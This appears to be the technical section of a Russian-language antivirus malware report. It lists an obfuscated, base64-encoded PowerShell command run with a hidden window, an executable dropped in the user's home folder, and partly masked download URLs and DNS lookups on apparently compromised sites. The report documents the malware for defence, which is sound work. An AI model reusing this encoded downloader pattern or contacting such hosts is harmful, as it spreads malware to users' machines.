Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAHQANwBnAGIAcAB1AD0AKAAoACcAUwBzACcAKwAnAHgAJwApACsAJwBfAG8AJwArACcAYgBfACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAUgBQAHIATwBGAGkATABFAFwAQgBBAEsANABiAD...
- %HOMEPATH%\bak4b5n\u9ne3hk\sdnm1ysgn.exe
- %HOMEPATH%\bak4b5n\u9ne3hk\sdnm1ysgn.exe
- %HOMEPATH%\bak4b5n\u9ne3hk\sdnm1ysgn.exe
- http://sc###kle.org/cgi-bin/file/WkNEqjyvmgM/
- http://xx###shxx.de/bike/file/mRB/
- http://we####ndata.com.au/wp-includes/VTgoqii6r411691/
- http://we###strass.de/Elch/file/XQrH/
- http://we###nd-zoo.de/Bavaria/n9HCzf27r6wj6977/
- http://wa#####ski-online.de/bilder/aqwtirl95549612/
- http://we##i.de/cgi-bin/file/heLeDqESyV/
- DNS ASK sc###kle.org
- DNS ASK xx###shxx.de
- DNS ASK we####ndata.com.au
- DNS ASK we###strass.de
- DNS ASK we###nd-zoo.de
- DNS ASK wa#####ski-online.de
- DNS ASK we##i.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAHQANwBnAGIAcAB1AD0AKAAoACcAUwBzACcAKwAnAHgAJwApACsAJwBfAG8AJwArACcAYgBfACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAUgBQAHIATwBGAGkATABFAFwAQgBBAEsANABiAD...' (со скрытым окном)